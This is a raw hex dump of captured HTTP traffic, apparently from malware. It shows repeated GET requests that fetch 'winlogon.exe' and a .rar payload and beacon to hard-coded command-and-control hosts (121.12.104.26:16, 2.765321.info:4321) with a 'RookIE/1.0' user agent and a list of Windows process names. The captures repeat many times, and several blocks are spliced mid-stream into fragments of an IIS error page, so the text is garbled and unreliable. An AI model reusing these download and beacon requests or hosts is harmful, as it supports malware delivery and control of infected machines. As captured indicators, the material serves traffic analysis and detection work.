0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f78756b 652f7769 6e6c6f67   GET /xuke/winlog
0x00000010 (00016)   6f6e2e65 78652048 5454502f 312e310d   on.exe HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20777777   0727)..Host: www
0x000000b0 (00176)   2e616263 3738392e 696e666f 0d0a436f   .abc789.info..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a466f 756e643c 2f68313e   ve....Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f73656f 2f78786a 666c6473   GET /seo/xxjflds
0x00000010 (00016)   6a666c6a 31303030 362e7261 72204854   jflj10006.rar HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 526f6f6b 49452f31 2e300d0a   nt: RookIE/1.0..
0x00000040 (00064)   486f7374 3a203132 312e3132 2e313034   Host: 121.12.104
0x00000050 (00080)   2e32363a 31360d0a 0d0a                .26:16....

0x00000000 (00000)   47455420 2f736d73 2f787878 30312e69   GET /sms/xxx01.i
0x00000010 (00016)   6e692048 5454502f 312e310d 0a416363   ni HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x000000b0 (00176)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a6f 756e643c 2f68313e   ive....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f73656f 2f78786a 666c6473   GET /seo/xxjflds
0x00000010 (00016)   6a666c6a 31303030 362e7261 72204854   jflj10006.rar HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 526f6f6b 49452f31 2e300d0a   nt: RookIE/1.0..
0x00000040 (00064)   486f7374 3a203132 312e3132 2e313034   Host: 121.12.104
0x00000050 (00080)   2e32363a 31360d0a 0d0a                .26:16....

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0a6f 756e643c 2f68313e   ve.....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f787878 30312e69   GET /sms/xxx01.i
0x00000010 (00016)   6e692048 5454502f 312e310d 0a416363   ni HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x000000b0 (00176)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a6f 756e643c 2f68313e   ive....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a313b 20535631 3b202e4e   ve....1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a6e 642e3c2f 703e0a20   ive....nd.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f787878 30312e69   GET /sms/xxx01.i
0x00000010 (00016)   6e692048 5454502f 312e310d 0a416363   ni HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x000000b0 (00176)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a3b 20535631 3b202e4e   ive....; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
